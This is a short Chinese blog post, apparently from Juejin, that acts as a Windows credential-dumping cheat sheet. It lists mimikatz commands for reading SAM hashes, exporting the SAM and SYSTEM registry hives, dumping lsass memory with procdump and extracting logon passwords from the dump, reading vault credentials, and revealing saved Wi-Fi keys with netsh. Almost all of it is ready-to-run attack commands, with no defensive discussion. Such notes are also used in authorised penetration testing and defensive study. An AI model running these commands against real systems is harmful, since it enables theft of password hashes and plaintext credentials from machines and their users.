本文已参与「新人创作礼」活动.一起开启掘金创作之路。
SAM
mimikatz读取sam文件
#提升权限
privilege::debug
token::elevate
#读取本地SAM文件,获得NTLM Hash
lsadump::sam
利用注册表导出sam文件
1、导出 SAM 和 System 文件:通过 reg 的注册表导出
reg save hklm\sam sam.hive
reg save hklm\system system.hive
2、使用mimikatz读取SAM和System文件
将导出的 system.hive 和 sam.hive 文件放到 mimikatz 文件夹下,然后运行mimikatz命令:
lsadump::sam /sam:sam.hive /system:system.hive
mimikatz在线读取sam文件
mimikatz.exe "privilege::debug" "log" "sekurlsa::logonpasswords"
lsass
procdump+mimikatz抓取密码
procdump 下载地址:https://docs.microsoft.com/zh-cn/sysinternals/downloads/procdump
1、导出lsass.dmp文件
通过 procdump.exe 文件导出lsass.dmp文件
在命令行输入命令会生成一个 lsass.dmp 文件:
procdump.exe -accepteula -ma lsass.exe lsass.dmp
2、使用mimikatz导出lsass.dmp文件中的密码散列值
首先将导出的lsass.dmp文件放到mimikatz的目录下,然后输入命令:
sekurlsa::minidump lsass.dmp
如果有 Switch to MINIDUMP 说明加载成功
3、运行命令导出密码散列值:
sekurlsa::logonPasswords full
windows凭据
mimikatz获取window普通凭据
mimikatz # vault::cred
wifi密码获取
netsh wlan show profile
netsh wlan show profile name="ssid" KEY=clear